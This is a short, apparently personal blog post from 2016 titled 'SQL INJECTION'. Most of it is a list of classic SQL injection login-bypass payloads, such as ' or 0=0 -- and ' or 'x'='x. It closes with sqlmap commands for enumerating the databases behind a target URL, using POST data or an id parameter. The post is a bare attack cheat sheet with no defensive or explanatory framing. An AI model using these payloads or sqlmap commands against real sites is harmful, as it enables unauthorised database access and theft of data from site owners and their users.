মঙ্গলবার, ২৬ জুলাই, ২০১৬

SQL INJECTION


" or 0=0 #
' or 0=0 #
" or 0=0 --
' or 0=0 --
' or 'x'='x


or 0=0 #
'or 'x'='x
" or "x"="x

' or 1=1--
" or 1=1 --
' or a=a --
" or "a"="a"



SQL injection check with post method:

---cd desktop
----cd sqlmap
----sqlmap.py -u "url" --data="usr&pw" --dbs



SQL injection check using url;

--cd desktop
---cd sqlmap
---sqlmap.py -u URL (with id) --dbs.